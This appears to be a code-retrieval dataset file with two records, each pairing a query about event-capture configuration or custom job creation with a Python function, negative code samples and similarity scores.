[ "0.6813228", "0.67946595", "0.6717539", "0.6711378", "0.6636821", "0.6603972", "0.6455036", "0.6390352", "0.63873655", "0.6378598", "0.6359191", "0.63422745", "0.6334636", "0.6332409", "0.6296997", "0.6277028", "0.627466", "0.62578577", "0.62556595", "0.6215644", "0.61823285", "0.6163456", "0.61622155", "0.6142611", "0.6137002", "0.6130823", "0.61188704", "0.61083007", "0.6106413", "0.6084834", "0.6076044", "0.60588664", "0.6044624", "0.60399663", "0.600434", "0.59961045", "0.5982097", "0.59768236", "0.5972545", "0.5959743", "0.5954097", "0.5926999", "0.59227115", "0.5910245", "0.59065974", "0.5902059", "0.5884645", "0.5877099", "0.58684534", "0.5846234", "0.5840908", "0.5840696", "0.5836571", "0.58335567", "0.5830606", "0.58305186", "0.5816279", "0.58105206", "0.58097774", "0.57954854", "0.5795149", "0.5777568", "0.57766694", "0.5764292", "0.57642406", "0.5759171", "0.57529175", "0.57426745", "0.57398844", "0.57387406", "0.5736854", "0.5735867", "0.57334524", "0.5727241", "0.5722079", "0.57109094", "0.5705907", "0.57056403", "0.5700089", "0.5699856", "0.5698077", "0.5675902", "0.5672272", "0.5670915", "0.56694835", "0.5663252", "0.5663252", "0.56619465", "0.5659898", "0.56595063", "0.5646939", "0.5644488", "0.5639163", "0.5638686", "0.5633868", "0.56316924", "0.56316924", "0.56316924", "0.5622007", "0.56174004", "0.5614158" ]
0.0
-1
Retrieve which events to capture from the config
def set_capture_events_from_config(self): event_config = [ { "config_key": "events_watchlist", "events": [ "watchlist.hit.process", "watchlist.hit.binary", "watchlist.storage.hit.process", "watchlist.storage.hit.binary" ], "options": self.forwarder_options.get("wlhitnotifenabled", "0") }, { "config_key": "events_feed", "events": [ "feed.ingress.hit.process", "feed.ingress.hit.binary", "feed.ingress.hit.host", "feed.storage.hit.process", "feed.storage.hit.binary", "feed.query.hit.process", "feed.query.hit.binary" ], "options": self.forwarder_options.get("feedhitnotif", "0") }, { "config_key": "events_alert", "events": [ "alert.watchlist.hit.ingress.process", "alert.watchlist.hit.ingress.binary", "alert.watchlist.hit.ingress.host", "alert.watchlist.hit.query.process", "alert.watchlist.hit.query.binary" ], "options": self.forwarder_options.get("alertnotifenabled", "0") }, { "config_key": "events_raw_sensor", "events": [ "ingress.event.process", "ingress.event.procstart", "ingress.event.netconn", "ingress.event.procend", "ingress.event.childproc", "ingress.event.moduleload", "ingress.event.module", "ingress.event.filemod", "ingress.event.regmod" "ingress.event.tamper", "ingress.event.crossprocopen", "ingress.event.remotethread", "ingress.event.processblock", "ingress.event.emetmitigation", ], "options": self.forwarder_options.get("rawsensnotifenabled", "0") }, { "config_key": "events_binary_observed", "events": ["binaryinfo.host.observed", "binaryinfo.observed," "binaryinfo.group.observed"], "options": self.forwarder_options.get("binobsnotifenabled", "0") }, { "config_key": "events_binary_upload", "events": ["binarystore.file.added"], "options": self.forwarder_options.get("binuplnotifenabled", "0") } ] self.capture_events = [] for event_type in event_config: events = self.forwarder_options.get(event_type["config_key"], "0").lower() if events == "all": self.capture_events.extend(event_type["events"]) elif events != "0": events_from_config = events.split(",") events_to_capture = list(set(events_from_config) & set(event_type["events"])) self.capture_events.extend(events_to_capture) self.logger.info("Configured to capture events: %s" % self.capture_events)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_events(self):\n #Returne the capture events\n raise NotImplementedError", "def get_events(self):\n #Returne the capture events\n raise NotImplementedError", "def get_events(self):\n raise NotImplementedError", "def get_events(self):\n raise NotImplementedError", "def get_events(self):\n return self.events", "def events(self):\n return self.current_events", "def available_events(self):\n return self.target.read_value(self.available_events_file).splitlines()", "def events(self):\n return self._events", "def events(self) -> Dict[EventCall, Set[Node]]:\n return self._events", "def getSimulationEventHandlers(self): \r\n return self.__eventHandlers.values()", "def events(self) -> object:\n return self._events", "def get_event_list(self):\n pass", "def events(self):\r\n return ev.Events(self)", "def events(self):\r\n return ev.Events(self)", "def GetEventSources(self):\n return self._GetAttributeContainers('event_source')", "def get_event(self):\n return self.keys.events.get()", "def get_sample_events(self): \n return self.sample_events[:]", "def events(self):\n return self.properties.get('events', EventCollection(self.context, ResourcePath(\"events\", self.resource_path)))", "def events(self):\r\n return e.Events(self)", "def get_events(self):\n ret = []\n while True:\n event = self.event.get_event(wait=1, full=True)\n if event is None:\n return ret\n ret.append(event)", "def get_events(self):\n self._events = []\n self.ircobj.process_once(timeout=0.1)\n return self._events", "def events(self) -> Sequence[Tuple[str, Sequence[Union[np.ndarray, bytes]]]]:\n return self._env.events()", "def get_config_parameter(config):\n\n selected_event = config['selected_event']\n datasource_raw_data = config['datasource_raw_data']['database']\n measurement_raw = config['datasource_raw_data']['measurement']\n measurement_enriched = config['datasource_enriched_data']['measurement']\n datasource_enriched_data = config['datasource_enriched_data']['database']\n datasource_marked_data = config['datasource_marked_data']['database']\n datasource_predicted_data = config['datasource_predicted_data']['database']\n start_time = config['timeframe'][0]\n end_time = config['timeframe'][1]\n register_dict = config['register_dict']\n required_registers = config[f\"{selected_event}_register\"]\n events = config[selected_event]\n measurement_predicted = config['datasource_predicted_data']['measurement']\n return selected_event, datasource_raw_data, measurement_raw, start_time, end_time, register_dict, \\\n required_registers, datasource_enriched_data, datasource_marked_data, \\\n measurement_enriched, events, datasource_predicted_data, measurement_predicted", "def event_handlers(self):\n if self.is_flow:\n return self._event_handlers\n\n try:\n return self._event_handlers\n except AttributeError:\n return self.flow._event_handlers", "def get_events(self):\n events = []\n for device in self:\n events.extend(self[device].get_events())\n return events", "def event_list(self):\n return self._event_list", "def events(self):", "def get_handlers_for_event(self, event):\n pass # pragma: no cover", "def get_all(self):\r\n return list(pecan.request.storage_conn.get_event_types())", "def eventList(self):\n return self._eventList", "def event_log(self):\n pass", "def get_event_handlers(self, obj):\n\n ret = []\n if not obj.events: return ret\n events = [(name,handler) for name, handler in obj.events if handler.strip()]\n if not events: return ret\n\n try:\n default_event = self.config['events']['default']['type']\n except KeyError:\n default_event = 'wxCommandEvent'\n\n for event, handler in sorted( events ):\n if not handler: continue\n\n if self.codegen.preview and handler.startswith(\"lambda \"):\n if self.codegen.language!='python': continue\n handler = \"lambda event: print('event handler: lambda function')\"\n\n major = 'wx%d' % self.codegen.for_version[0]\n detailed = 'wx%d%d' % self.codegen.for_version\n try:\n supported_by = self.config['events'][event]['supported_by']\n if not (major in supported_by or detailed in supported_by):\n continue\n except (AttributeError, KeyError):\n pass\n\n # check for specific event type\n type_generic = 'type_%s' % major\n try:\n evt_type = self.config['events'][event][type_generic]\n ret.append((obj, event, handler, evt_type))\n continue\n except KeyError:\n pass\n\n # check for generic event type\n try:\n evt_type = self.config['events'][event]['type']\n except KeyError:\n evt_type = default_event\n ret.append((obj, event, handler, evt_type))\n return ret", "def required_event_keys(cls):\n return {'app_type', 'destination_function_name', 'schedule_expression'}", "def list_events(option, opt_str, value, parser):\n\n print 'On this system SystemConfiguration supports these events:'\n for event in sorted(SCDynamicStoreCopyKeyList(get_sc_store(), '.*')):\n print \"\\t\", event\n\n print\n print \"Standard NSWorkspace Notification messages:\\n\\t\",\n print \"\\n\\t\".join('''\n NSWorkspaceDidLaunchApplicationNotification\n NSWorkspaceDidMountNotification\n NSWorkspaceDidPerformFileOperationNotification\n NSWorkspaceDidTerminateApplicationNotification\n NSWorkspaceDidUnmountNotification\n NSWorkspaceDidWakeNotification\n NSWorkspaceSessionDidBecomeActiveNotification\n NSWorkspaceSessionDidResignActiveNotification\n NSWorkspaceWillLaunchApplicationNotification\n NSWorkspaceWillPowerOffNotification\n NSWorkspaceWillSleepNotification\n NSWorkspaceWillUnmountNotification\n '''.split())\n\n sys.exit(0)", "def file_events(self):\n return self._file_events", "def get_events(self):\n events_path = self.config.get('filename_rasterization_events')\n if events_path is not None:\n summary = pd.read_csv(events_path)\n return summary\n else:\n return None", "def events(self) -> typing.List[aws_cdk.aws_s3.EventType]:\n return self._values.get('events')", "def _setup_events(conf):\n events = {}\n for name in conf.keys():\n events[name] = Event(name=name)\n for listener in conf[name]:\n action = 'run'\n if ':' in listener:\n listener, action = listener.rsplit(':')\n events[name].add_listener(listener, action)\n\n # Add events to module scope.\n globals().update(events)", "def getevent(self, filename):\n return self.events[filename.lower()]", "def config(self): # type: () -> t.Dict[str, t.Any]\n return self.inspection['Config']", "def audit_log_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AuditLogConfigArgs']]]]:\n return pulumi.get(self, \"audit_log_configs\")", "def state_capture_do(cfg, app, win, events):", "def get_timed_events(self):\n return self.dispatcher.timed_events", "def event(self):\n return self.events[0]", "async def load_events(\n self,\n event_config: dict,\n guild: Guild\n ) -> Dict[int, BaseEvent]:\n events = {}\n for message_id_str, event_dict in event_config.items():\n events[int(message_id_str)] = await self.load_event(\n event_dict,\n guild\n )\n\n return events", "def event_stats(self):\n pass", "def event_pattern(self):\n pass # pragma: no cover", "def evrConfig(self):\n return getattr(getattr(self._data.evrConfig, self._name), 'evr')", "def get_event(self):\r\n return self.events[0]", "def build_events(self) -> list:\n raise NotImplementedError()", "def get_events_list(self, opts, args):\n\n\t\timport events\n\n\t\tself.setup_listener_gettext()\n\n\t\t# we need to merge, because some events have only\n\t\t# handlers, and others have only callbacks.\n\t\tevents_names = set(events.events_handlers.keys()\n\t\t\t\t\t\t\t+ events.events_callbacks.keys())\n\t\tmax_name_len = max(len(x) for x in events_names)\n\n\t\tif opts.verbose >= verbose.INFO:\n\t\t\tremote_output(_(u'{0} distinct event(s), {1} handler(s) '\n\t\t\t\t\tu'and {2} callback(s)').format(len(events_names),\n\t\t\t\t\tsum(len(x) for x in events.events_handlers.itervalues()),\n\t\t\t\t\tsum(len(x) for x in events.events_callbacks.itervalues())\n\t\t\t\t\t) + u'\\n')\n\t\t\tfor event_name in events_names:\n\t\t\t\thandlers = events.events_handlers.get(event_name, ())\n\t\t\t\tcallbacks = events.events_callbacks.get(event_name, ())\n\n\t\t\t\tremote_output(_(u'Event: {0}\\n\\tHandlers:{1}{2}\\n'\n\t\t\t\t\t\tu'\\tCallbacks:{3}{4}\\n').format(\n\t\t\t\t\tstylize(ST_NAME, event_name),\n\t\t\t\t\tu'\\n\\t\\t' if len(handlers) else u'',\n\t\t\t\t\tu'\\n\\t\\t'.join(_(u'{0} in module {1}').format(\n\t\t\t\t\t\tstylize(ST_NAME, h.__name__),\n\t\t\t\t\t\tstylize(ST_COMMENT, h.__module__)) for h\n\t\t\t\t\t\t\tin handlers),\n\t\t\t\t\tu'\\n\\t\\t' if len(callbacks) else u'',\n\t\t\t\t\tu'\\n\\t\\t'.join(_(u'{0} in module {1}').format(\n\t\t\t\t\t\tstylize(ST_NAME, c.__name__),\n\t\t\t\t\t\tstylize(ST_COMMENT, c.__module__)) for c\n\t\t\t\t\t\t\tin callbacks),\n\t\t\t\t))\n\t\telse:\n\t\t\tfor event_name in events_names:\n\t\t\t\tremote_output(_(u'{0}: {1} handler(s), {2} callback(s).\\n').format(\n\t\t\t\t\t\t\tstylize(ST_NAME, event_name.rjust(max_name_len)),\n\t\t\t\t\t\t\tlen(events.events_handlers.get(event_name, ())),\n\t\t\t\t\t\t\tlen(events.events_callbacks.get(event_name, ())),\n\t\t\t\t\t\t))", "def events(self):\r\n return resources.Events(self)", "async def events(self) -> Iterable[Event]:", "def parse_events(events_dict):\n return events_dict['events']", "def get_config_files(self):\n flag, i = self.inotify\n\n if flag:\n kwargs = {}\n\n if PY3:\n kwargs['timeout_s'] = 0\n\n filenames = set()\n\n for event in i.event_gen(**kwargs):\n if event is None:\n break\n\n filenames.add(event[3])\n\n return list(filenames)\n\n else:\n return os.listdir(self.watch)", "def getevent(self, name):\n return self.events[name.lower()]", "def events(config, time, utc, a, tk):\n if not config.store:\n try:\n cert = tk.read()\n token = _collect_token(config, cert)\n except:\n click.secho(\"No token\", fg='red')\n else:\n _check_options(config, \"events\", time, utc, a, token)\n else:\n try:\n token = config._set_token()\n except:\n click.secho(\"No token\", fg='red')\n else:\n _check_options(config, \"events\", time, utc, a, token)", "def get_events(self):\n disallowed = [ident(self.add_event.__func__), ident(ident)]\n self.frames = None\n\n return [item for item in self.events if item[2] not in disallowed]", "def handleEvents(self, events):\n pass", "def eventList(filterStr=\"\"):\n\tfilterStr = filterStr.upper()\n\tevents = [i for i in dir(cv2) if 'EVENT' in i and filterStr in i]\n\treturn events", "def _default_events_fetcher(self):\n raise NotImplementedError", "def _default_events_fetcher(self):\n raise NotImplementedError", "def event_filters(self) -> pulumi.Output[Sequence['outputs.EventFilterResponse']]:\n return pulumi.get(self, \"event_filters\")", "def GetEventData(self):\n return self._GetAttributeContainers('event_data')", "def on_starting(self):\n\n self.set_capture_events_from_config()", "def get_events(self):\n\n events = []\n\n for watched_file in self._watched_files:\n for line in watched_file:\n self._do_rule_processing(line, events)\n\n return events", "def bootstrap_core_events() -> Sequence[EventDefinition[Any]]: # type: ignore\n return (\n (\n EVENT_ID_EVENT_LISTENER_ADDED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n EventListenerAddedEvent,\n EventListenerAddedEvent(EVENT_ID_EVENT_LISTENER_ADDED, NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_REGISTER_EVENT,\n QUEUE_EVENT_HIGH, PRODUCE_EVENT_PROTECTION,\n RegisterEventEvent,\n RegisterEventEvent(\n EVENT_ID_DISPOSE_COMPLETE, QUEUE_EVENT_IO, GLOBAL_EVENT_PROTECTION,\n DisposeCompleteEvent, DisposeCompleteEvent(NOT_PARTICIPANT)\n ),\n ),\n (\n EVENT_ID_DISPOSE_COMPLETE,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n DisposeCompleteEvent,\n DisposeCompleteEvent(NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_REQUEST_DISPOSE,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n RequestDisposeEvent,\n RequestDisposeEvent(NOT_PARTICIPANT),\n ),\n (\n EVENT_ID_COMPONENT_CREATED,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n ComponentCreatedEvent,\n ComponentCreatedEvent(NOT_PARTICIPANT, 1),\n ),\n (\n EVENT_ID_COMPONENT_CREATION_FAILED,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n ComponentCreationFailedEvent,\n ComponentCreationFailedEvent('x', 1, UserMessage(i18n(''))),\n ),\n (\n EVENT_ID_REQUEST_NEW_COMPONENT,\n QUEUE_EVENT_NORMAL, GLOBAL_EVENT_PROTECTION,\n RequestNewComponentEvent,\n RequestNewComponentEvent(object(), NOT_PARTICIPANT, 1),\n ),\n (\n EVENT_ID_SYSTEM_STARTED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n SystemStartedEvent,\n SystemStartedEvent(),\n ),\n (\n EVENT_ID_SYSTEM_HALTED,\n QUEUE_EVENT_NORMAL, CONSUME_EVENT_PROTECTION,\n SystemHaltedEvent,\n SystemHaltedEvent()\n ),\n (\n EVENT_ID_ERROR,\n QUEUE_EVENT_HIGH, GLOBAL_EVENT_PROTECTION,\n ErrorEvent,\n ErrorEvent(ErrorReport('', ERROR_CATEGORY_USER, UserMessage(i18n(''))))\n ),\n )", "def events(self):\n return get_tsv(self.path, self.values, 'events.tsv')", "def sensors(self):\n return self.camdata.current_event_states", "def get_devices(self):\n devices = self.get(\"event/device\")", "def respond_to_events(self):\n event_response = MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events)\n\n if event_response == []:\n return {}\n return event_response[0]", "def get_api_event(self):\n pass", "def quic_configs(self) -> Sequence['outputs.GetListenersListenerQuicConfigResult']:\n return pulumi.get(self, \"quic_configs\")", "def events(self):\n return self.search(comp_class=Event)", "def _est_config(self):\n return self._est_method.config", "def get_game_events(self):\n\t\tcontents = self.archive.read_file('replay.game.events')\n\t\treturn self.protocol.decode_replay_game_events(contents)", "def event_map(self) -> dict:\n return self._event_map", "def event_filters(self) -> pulumi.Input[Sequence[pulumi.Input['EventFilterArgs']]]:\n return pulumi.get(self, \"event_filters\")", "def list_events(self, name):\n return self._get_events(name)", "def get_events():\n url = app.config['EVENTS_ENDPOINT']\n response = requests.get(url, params={})\n if response.status_code == 200:\n return parse_events(response.json())\n raise RuntimeError('Error in retrieving events.')", "def list_events():\n return [\n snow,\n mosquito,\n sun_heat,\n orage,\n overflowing,\n gathering,\n trampling,\n pollution,\n southern_wind,\n northern_wind,\n fog,\n sun\n ]", "def _get_conf(self):\n self.press_conf = self.sysconf['PressureRegulators']\n return self.press_conf['PressureRegulator%d' % self.id_]", "def events(self) -> Optional[annotations.Events]:\n return load_events(self.csv_path)", "def all_events(cls) -> \"IFilterPattern\":\n return jsii.sinvoke(cls, \"allEvents\", [])", "def get_allpack_events(self):\n return self.comp('packmanager').get_allpack_events()", "def audit_log_configs(self) -> Sequence['outputs.AuditLogConfigResponse']:\n return pulumi.get(self, \"audit_log_configs\")", "def event_stats(self):\n return self.base_stats", "def get_events():\n # reads the session\n session = request.args.get('session', type=str)\n process = request.args.get('process', default='receipt', type=str)\n\n dictio = {}\n\n if check_session_validity(session):\n user = get_user_from_session(session)\n if lh.check_user_log_visibility(user, process):\n caseid = request.args.get('caseid', type=str)\n events = lh.get_handler_for_process_and_session(process, session).get_events(caseid)\n i = 0\n while i < len(events):\n keys = list(events[i].keys())\n for key in keys:\n if str(events[i][key]).lower() == \"nan\" or str(events[i][key]).lower() == \"nat\":\n del events[i][key]\n i = i + 1\n dictio = {\"events\": events}\n ret = jsonify(dictio)\n return ret", "def event_queue(self):\n return self.assoc.dul.event_queue", "def event(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"event\")", "def get_attributes(self):\n\t\tcontents = self.archive.read_file('replay.attributes.events')\n\t\treturn self.protocol.decode_replay_attributes_events(contents)", "def config(self):\n annotations = IAnnotations(self.context)\n return annotations.get(CONFIGURATION_KEY, {})", "def getSimulationEventGenerators(self):\r\n raise NotImplementedError()", "def prepare_config(cls, config, is_mode_config):\n if not is_mode_config:\n if 'enable_events' not in config:\n config['enable_events'] = 'ball_started'\n if 'disable_events' not in config:\n config['disable_events'] = 'ball_will_end'\n return super().prepare_config(config, is_mode_config)", "def prepare_config(cls, config, is_mode_config):\n if not is_mode_config:\n if 'enable_events' not in config:\n config['enable_events'] = 'ball_started'\n if 'disable_events' not in config:\n config['disable_events'] = 'ball_will_end'\n return super().prepare_config(config, is_mode_config)", "def get_cycles_with_events(self):\n cycles = []\n for el in self.events:\n for key in el:\n if type(el[key]) == dict and \"cycle\" in el[key]:\n cycles.append(el[key][\"cycle\"])\n return cycles if len(cycles) > 0 else None", "def gather_configuration(self, config):\n config['log']['logging_level'] = self.logDisplay.get_logging_level()\n\n # MIDI\n config['midi']['winch_midi_input'] = self.winchMidiInputCombo.current_item()\n config['midi']['midi_output'] = self.midiOutputCombo.current_item()\n\n # OSC\n addr, port = self.oscListenerConfig.get_OSC_port()\n config['osc']['listener_addr'] = addr\n config['osc']['listener_port'] = str(port)\n addr, port = self.oscSenderConfig.get_OSC_port()\n config['osc']['sender_addr'] = addr\n config['osc']['sender_port'] = str(port)\n\n # DMX\n config['dmx']['dmx_output_serial_port'] = self.dmxSelect.current_item()\n\n # winches\n for i, winchSelect in enumerate(self.winchSelects):\n key = \"winch_%d_output_serial_port\" % (i+1)\n config['winches'][key] = winchSelect.current_item()\n\n return", "def available_functions(self):\n return self.config.keys()", "def notification_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FhirNotificationConfigArgs']]]]:\n return pulumi.get(self, \"notification_configs\")", "def get_event_parts(self, event):\r\n if self.board is None:\r\n return None\r\n \r\n return self.board.area.get_event_parts(event)" ]
[ "0.7154731", "0.7154731", "0.6736886", "0.6736886", "0.6634429", "0.6563874", "0.6368687", "0.6339225", "0.6153467", "0.6147387", "0.6090058", "0.60785455", "0.6055919", "0.6055919", "0.6025618", "0.60202944", "0.60145056", "0.60046005", "0.59880394", "0.5945153", "0.5929929", "0.5897296", "0.58912104", "0.5885696", "0.5836988", "0.58198863", "0.5816348", "0.5788318", "0.5783439", "0.5779", "0.5772006", "0.5766295", "0.57557803", "0.5746701", "0.57403934", "0.57002306", "0.5668009", "0.566208", "0.56292546", "0.560008", "0.55915874", "0.5582906", "0.55812645", "0.5574418", "0.55533975", "0.5514624", "0.5497138", "0.5487934", "0.54834926", "0.5475069", "0.54727745", "0.54724693", "0.54689485", "0.54630786", "0.5459319", "0.5457004", "0.5455284", "0.545281", "0.5449081", "0.5439896", "0.5439735", "0.5439735", "0.5427479", "0.542375", "0.54152286", "0.5409262", "0.54004014", "0.5384491", "0.5373765", "0.53709406", "0.5363837", "0.53580254", "0.53523123", "0.53395474", "0.5317266", "0.53074247", "0.5306851", "0.5284953", "0.5283504", "0.52795255", "0.5261794", "0.5242784", "0.5241931", "0.5240707", "0.5222774", "0.5218455", "0.51810765", "0.51786226", "0.51780146", "0.5174763", "0.51627505", "0.51585007", "0.5156394", "0.5147988", "0.5147988", "0.5142038", "0.51240826", "0.5122801", "0.5115813", "0.5115588" ]
0.7547521
0
the id of the Condition
def __init__(self): self.id = None self.typeInfo['id'] = 'string' """the owner of the Condition.""" self.account = None self.typeInfo['account'] = 'string' """Details of the Counter.""" self.counter = None self.typeInfo['counter'] = 'list' """the domain name of the owner.""" self.domain = None self.typeInfo['domain'] = 'string' """the domain id of the Condition owner""" self.domainid = None self.typeInfo['domainid'] = 'string' """the project name of the Condition""" self.project = None self.typeInfo['project'] = 'string' """the project id of the Condition.""" self.projectid = None self.typeInfo['projectid'] = 'string' """Relational Operator to be used with threshold.""" self.relationaloperator = None self.typeInfo['relationaloperator'] = 'string' """Threshold Value for the counter.""" self.threshold = None self.typeInfo['threshold'] = 'long' """zone id of counter""" self.zoneid = None self.typeInfo['zoneid'] = 'string'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getId(self):", "def condition_id(self, condition_id):\n\n self._condition_id = condition_id", "def id(self):\n return self.status.id", "def getID():", "def _id(self):\n pass", "def get_id(self):\n return \"required_modules_exists_but_condition_is_false_plugin\"", "def check_id(self, id):", "def id(self):\n\t\treturn self.__id", "def id(self):\n return self[\"id\"]", "def identifier(self):\r\n return self.id", "def fullId(self):\n return self.sampleid+' '+self.condition+' '+self.activeChildWellIdStr()", "def getIdent (self) :\n return self.id", "def condition(self) -> global___Expression:", "def condition(self) -> global___Expression:", "def id(self):\n return self.getattr('id')", "def condition_number(self):\n return self._condition_number", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def id(self):\n raise NotImplementedError()", "def getID(self) -> int:\n ...", "def id(self):\n return self.get('id')", "def id(self) -> str:\n pass", "def id(self):\n return self.__id", "def id(self): # type: () -> str\n return self.inspection['Id']", "def get_id(self, expr):\n return self.table.inv[expr]", "def match_id(self):\n return self._id", "def id(self):\n return self.query.query_id", "def condition(self) -> str | None:\n return self._condition", "def id(self):\n return self.data[\"id\"]", "def id(self):\n return self.values.get('id')", "def getId(self): #$NON-NLS-1$\r", "def resourceid(self):", "def _get_id(self):\n return self.id", "def id(self):\n return self.get_data(\"id\")", "def condition_code(self) -> int:\n condition_code = {\"new\": 1000, \"used\": 3000}\n\n try:\n return condition_code[self.__condition_name] \n except KeyError:\n raise KeyError(\"condition_name must be a string 'new' or 'used'\")", "def id(self) -> Optional[str]:\n return self.elem.get('id')", "def get_id(self): # pragma: no cover\n pass", "def getCondition(self):\r\n return self.controller.getCondition()", "def logical_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"logical_id\")", "def logical_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"logical_id\")", "def logical_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"logical_id\")", "def logical_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"logical_id\")", "def get_condition_identifiers(self):\n\t\treturn set(self.conditions)", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def condition(self) -> Optional[str]:\n return pulumi.get(self, \"condition\")", "def get_actual_id(translated):", "def id(self) -> str:\n return self.value", "def id(self):\n return self.data.id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):", "def getId(*args):" ]
[ "0.615068", "0.60920733", "0.60874665", "0.60557884", "0.5979219", "0.5969927", "0.5945815", "0.593884", "0.59332013", "0.589888", "0.5893271", "0.58621705", "0.58531296", "0.58531296", "0.58335763", "0.57970726", "0.57366246", "0.57366246", "0.57366246", "0.57366246", "0.5713217", "0.56852996", "0.5669668", "0.56557226", "0.56450987", "0.5632942", "0.5631342", "0.5628311", "0.5618573", "0.55993605", "0.5592219", "0.55867267", "0.558389", "0.5579396", "0.5577821", "0.55752593", "0.5569272", "0.5563658", "0.555306", "0.55511737", "0.55409896", "0.55409896", "0.55409896", "0.55409896", "0.55380523", "0.55252945", "0.55252945", "0.55252945", "0.55252945", "0.55252945", "0.55252945", "0.5511745", "0.54968077", "0.54854363", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5467454", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225", "0.5461225" ]
0.0
-1
Constructs a request and sends it to the endpoint to create a custom job instance.
def Create(self, parent, specs=None, config_path=None, display_name=None, python_package_uri=None, args=None, command=None, kms_key_name=None, network=None, service_account=None): if not python_package_uri: python_package_uri = [] job_spec = self.messages.GoogleCloudAiplatformV1beta1CustomJobSpec() job_spec.network = network job_spec.serviceAccount = service_account if config_path: data = yaml.load_path(config_path) if data: job_spec = messages_util.DictToMessageWithErrorCheck( data, self.messages.GoogleCloudAiplatformV1beta1CustomJobSpec) worker_pool_specs = [] if specs is not None: for spec in specs: machine_type = spec.get('machine-type') if not spec.get('replica-count'): replica_count = 1 else: replica_count = int(spec.get('replica-count')) container_image_uri = spec.get('container-image-uri') python_image_uri = spec.get('python-image-uri') python_module = spec.get('python-module') machine_spec = ( self.messages.GoogleCloudAiplatformV1beta1MachineSpec( machineType=machine_type)) worker_pool_spec = ( self.messages.GoogleCloudAiplatformV1beta1WorkerPoolSpec( replicaCount=replica_count, machineSpec=machine_spec)) if container_image_uri: worker_pool_spec.containerSpec = ( self.messages.GoogleCloudAiplatformV1beta1ContainerSpec( imageUri=container_image_uri)) if args is not None: worker_pool_spec.containerSpec.args = args if command is not None: worker_pool_spec.containerSpec.command = command if python_package_uri or python_image_uri or python_module: worker_pool_spec.pythonPackageSpec = ( self.messages.GoogleCloudAiplatformV1beta1PythonPackageSpec( executorImageUri=python_image_uri, packageUris=python_package_uri, pythonModule=python_module)) if args is not None: worker_pool_spec.pythonPackageSpec.args = args worker_pool_specs.append(worker_pool_spec) if worker_pool_specs: job_spec.workerPoolSpecs = worker_pool_specs validation.ValidateWorkerPoolSpec(job_spec.workerPoolSpecs) custom_job = ( self.messages.GoogleCloudAiplatformV1beta1CustomJob( displayName=display_name, jobSpec=job_spec)) if kms_key_name is not None: custom_job.encryptionSpec = self.messages.GoogleCloudAiplatformV1beta1EncryptionSpec( kmsKeyName=kms_key_name) return self._service.Create( self.messages.AiplatformProjectsLocationsCustomJobsCreateRequest( parent=parent, googleCloudAiplatformV1beta1CustomJob=custom_job))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
